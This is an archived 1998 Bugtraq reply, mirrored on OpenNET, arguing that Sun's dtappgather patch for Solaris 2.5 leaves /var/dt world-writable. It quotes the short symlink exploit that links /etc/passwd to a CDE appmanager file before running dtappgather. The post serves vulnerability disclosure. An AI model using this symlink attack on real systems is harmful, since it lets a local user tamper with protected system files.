The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Новость: Установка sendamil с SMTP-авторизацией и проверкой на вирусы под FreeBSD
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

/usr/dt/bin/dtappgather exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Thu, 26 Feb 1998 14:24:21 +0500 (ESK)
Date: Wed, 25 Feb 1998 20:26:02 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: /usr/dt/bin/dtappgather exploit

>
> patches  104497    CDE 1.0.1: dtappgather patch

        I'm afraid that's not enough: it fixes the DTUSERSESSION
        bug; but it doesn't fixes directory permisions.

        In a Solaris 2.5 sparc box, with patch 104497-02
        you have:

drwxrwxrwx   4 root     root        1536 Feb 25 19:46 /var/dt
drwxrwxrwx   3 bin      bin          512 Jan 20  1997 /var/dt/appconfig
drwxr-xr-x   4 elias    robot        512 Oct  6 14:42 /var/dt/tmp
               ^^^^^ this is a normal non-admin account; sometimes
                           the CDE login sessions changes it.

        so, it's still vulnerable to the link exploit

        (but yes, this is not a problem in 2.6, I don't know about 2.5.1)


> > > nigg0r@host% ls -l /etc/passwd
> > > -r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
> > > nigg0r@host% ln -s /etc/passwd
> /var/dt/appconfig/appmanager/generic-display-0
> > > nigg0r@host% dtappgather


--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
InterReklama Advertizing
Интерреклама. Интернет
RB2 Network.